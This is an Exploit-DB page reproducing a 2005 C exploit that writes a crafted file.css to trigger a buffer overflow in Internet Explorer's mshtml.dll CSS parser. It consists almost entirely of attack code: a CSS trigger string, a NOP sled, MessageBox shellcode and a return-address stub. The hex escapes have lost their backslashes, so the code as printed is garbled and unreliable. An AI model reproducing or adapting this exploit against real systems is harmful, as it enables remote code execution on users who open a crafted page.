https://www.exploit-db.com/exploits/868

漏洞细节尚未披露

/* 
Taken from http://www.securiteam.com/exploits/5NP042KF5A.html 

The exploit will create a .CSS file that should be included 
in an HTML file. When a user loads the HTML file, Internet 
Explorer will try to parse the CSS and will trigger the 
buffer overflow. 
*/

//Exploit Code:
#include <stdio.h>
#include <string.h>
#include <tchar.h>

char bug[]=
"x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F"
"x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20";

//////////////////////////////////////////////////////
/*
shellcode :MessageBox (0,"hack ie6",0,MB_OK);
-
XOR EBX,EBX
PUSH EBX ; 0
PUSH EBX ; 0
ADD AL,0F
PUSH EAX ; Msg " Hack ie6 "
PUSH EBX ;0
JMP 746D8E72 ;USER32.MessageBoxA
*/

char shellcode[]= "x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74"
"x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73";


////////////////////////////////////////////////////////
// return address :: esp+1AC :: start shellcode
//MOV EAX,ESP
//ADD AX,1AC
//CALL EAX

char ret[]= "x8BxC4x66x05xACx01xFFxD0";

int main(int argc, char* argv[])
{

    char buf[8192];
    FILE *cssfile;
    int i;

    printf("nn Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit n");
    printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n");
    printf(" Coded by : Arabteam2000 n");
    printf(" Web: www.arabteam2000.com n");
    printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~nn");

        // NOP`s
        for(i=0;i<8192;i++)
        buf[i]=0x90;


                // bug
        memcpy((void*)&buf[0],
                (void*)&bug,48);

        // shellcode
        memcpy((void*)&buf[100],
                (void*)&shellcode,27);

        // ret address
        memcpy((void*)&buf[8182],
                (void*)&ret,8);


        cssfile=fopen("file.css","w+b");
        if(cssfile==NULL){
                printf("-Error: fopen n");
        return 1;
        }

                fwrite(buf,8192,1,cssfile);
        printf("-Created file: file.cssn ..OKnn");

        fclose (cssfile);
        return 0;
}

// milw0rm.com [2005-03-09]